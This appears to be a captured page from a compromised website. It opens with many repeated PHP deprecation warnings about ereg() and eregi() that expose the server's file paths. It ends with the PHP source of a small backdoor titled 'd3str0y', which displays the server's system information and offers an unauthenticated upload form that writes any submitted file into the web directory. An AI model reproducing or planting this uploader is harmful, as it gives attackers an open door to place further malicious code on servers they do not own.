<br />
<b>Deprecated</b>:  Function ereg() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>792</b><br />
<br />
<b>Deprecated</b>:  Function ereg() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>792</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\include\functions.php</b> on line <b>761</b><br />
<br />
<b>Deprecated</b>:  Function eregi() is deprecated in <b>D:\inetpub\webs\occhiuzzitimingit\public\scuola_1\index.php</b> on line <b>1093</b><br />
<title>d3str0y</title>
<?php
echo '<b>d3str0y<<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !</b><br><br>'; }
	else { echo '<b>Upload Fail !</b><br><br>'; }
}
?>